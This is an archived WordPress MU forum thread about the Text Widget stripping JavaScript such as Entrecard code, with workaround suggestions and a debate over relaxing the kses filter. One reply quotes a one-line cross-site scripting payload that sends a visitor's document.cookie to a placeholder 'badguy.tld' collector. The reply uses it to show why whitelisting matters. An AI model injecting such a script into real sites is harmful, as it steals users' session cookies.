The MU forums have moved to WordPress.org

Text Widget in WPMU 1.5 (20 posts)

  1. hyperdry
    Member
    Posted 14 years ago #

    hi all,

    i am having problems with the Text Widget. It works fine for a text but when i insert a code it does not apear on the front end. when i check out the text widget, the code was not saved.

    is this a bug or have i done something dumb?

    thanks

  2. tdjcbe
    Member
    Posted 14 years ago #

    How about some specifics, links, copy of the code you're trying to add in, etc?

  3. andrea_r
    Moderator
    Posted 14 years ago #

    If the code you're placing in a text widget has *any* javascript in it - liek a webring code, Amazon stuff etc... - it WILL get stripped out as a security measure.

    Best bet is to look for a wdiget that handles the code you're trying to paste in , or build your own widget to handle it.

  4. hyperdry
    Member
    Posted 14 years ago #

    thanks, your replies are very much appreciated.

    andrea_r, yes the code i wanted to place is a javascript from entrecard. do u know any widget that allows me to paste codes?

    cheers!

  5. andrea_r
    Moderator
    Posted 14 years ago #

    No, there's no widget that allows you to paste in codes. you'll have to find an entrecard widget or make one.

    MU will strip out any and all javascript unless you do.

  6. demonicume
    Member
    Posted 14 years ago #

    there are a couple of ways to do this. here are 2 that i've tried.

    Thainy's hack

    Someone coded an unfiltered widget

    you could also use the unfiltered mu plugin which i can't seem to find right now.

  7. tdjcbe
    Member
    Posted 14 years ago #

    I believ this is what you're thinking of:

    http://wpmututorials.com/news/unfiltered-html-for-mu/

  8. demonicume
    Member
    Posted 14 years ago #

    ahh, the power of google! From the site
    Entrecard Me!
    Vladimir on December 5th, 2007

    Entrecard Me! will allow you to easily use Entrecard widget on your Wordpress Blog.

  9. mark-k
    Member
    Posted 14 years ago #

    Is it possible to relax the kses to handle most of the real life need for JS and flash?

    I might be really wrong here, but isn't the main security threat against which the filtering is done is cookie theft, and if JS is loaded from a different domain it is the browser's responsibility not to give access to the cookies? therefor there should not be any possible security breach if kses will allow the inclusion of JS with the <script src="otherdomain.com/file.js" /> syntax?

  10. donncha
    Key Master
    Posted 14 years ago #

    mark-k what about the following snippet:
    <script>var img=new Image();img.src=\'http://badguy.tld/cookiecollect.php?c=\' document.cookie;</script>

    From http://www.ush.it/2006/07/28/httponly-cookies-and-mozilla-firefox/

    You could possibly filter out document.cookie but that's not a good way to go because someone's going to figure out a way around your code if you only blacklist, instead of the whitelisting we do now.

  11. mark-k
    Member
    Posted 14 years ago #

    Donncha, I should have spelled out that no javascript protocol and embedded scripting should be allowed, just relax the rules for the self enclosed script tags.

    I think that statistics services ask you to embed a JS in this way in order to provide richer data. I don't really have any strong knowledge for how many services this will be enough.

    The more interesting part of my proposal is to implement the same for flash. If a flash file is loaded from another domain, what harm can it do?

  12. lunabyte
    Member
    Posted 14 years ago #

    "If a flash file is loaded from another domain, what harm can it do?"

    Seriously?

    As much or more harm than javascript, and javascript can neuter your site pretty quickly.

  13. mark-k
    Member
    Posted 14 years ago #

    Lunabyte, are you suggesting that all the plugins which embed youtube are not secure because they embed flash?

    In any case, I guess that you will agree that there are sites from which it is safe to load flash. It might be easier to maintain a white list of such sites then writing a plugin/widgets for all of them.

  14. lunabyte
    Member
    Posted 14 years ago #

    That's not what I'm saying.

    What I am saying however is that once a user has permission to use embed, object, script, etc. tags without restraint, then you lose control of what is used as a source of those tags.

    There will always be a user who whines a tune about "well you let this site, and this site is more popular but it's blocked". Etc., so an, and so forth.

    Not to mention that once your site gets hacked, you realize it came from allowing these codes, and then you take it away, end users get rather upset.

    Easiest method is to simply create a plugin. By doing so, you allow users to input the dynamic portion of the code (like the video id from youtube) in as a parameter (which should be sanitized and checked), then the plugin in turn spits out the correct code.

    That gives you the functionality, but keeps the control in your hands.

    But hey, it's your site, do whatever you want with it. That's cool, but when it gets hacked to bits one day, be prepared for a lot of "we told you so" comments. ;)

  15. hyperdry
    Member
    Posted 14 years ago #

    thanks demonicume

  16. uscommonsense
    Member
    Posted 13 years ago #

    Ok, I am now running into this problem on my WpMu 2.6.3 site. One one of the blogs, EntreCard and AdSense works perfectly fine (via Text widgets). On another site, neither works (using the same theme template). Anyone care to guess why it would work on one blog and not another?

    Site where the scripts are working: http://darkness.blog-now.net/

    Site where the scripts are not working: http://chocolatekisses.blog-now.net/

  17. uscommonsense
    Member
    Posted 13 years ago #

    In the mean time, I am using the EntreCard Me! Widget as a Text Box widget. Still, a viable (and simple) work-around for scripts in the text box widget would be welcomed.

  18. andrea_r
    Moderator
    Posted 13 years ago #

    Scripts in a text box widget, just make your own:

    http://wpmututorials.com/plugins/build-your-own-widget/

  19. uscommonsense
    Member
    Posted 13 years ago #

    Thanks Andrea. I was able to create the widget. However, when I add the widget to my sidebar and click on the "edit" link, there is no field to update the text. All that is displayed is a sentence saying "There are no options for this widget."

    Here is a screen shot: http://uscommonsense.net/images/BAWscreenshot.jpg

    I reviewed the code from the download file from your link above, and I do not see what might be causing the issue. Any tips?

    Thanks again for your help. :)

  20. andrea_r
    Moderator
    Posted 13 years ago #

    Because that blank widget doesn't have those options built in. So if there's no options (which there isn't) then they won't show.

    If you need options, then you'll have to look at another one I did and get the extra lines from there.

    http://wpmututorials.com/plugins/so-easy-my-mom-can-use-it-the-image-badge-widget/

About this Topic

  • Started 14 years ago by hyperdry
  • Latest reply from andrea_r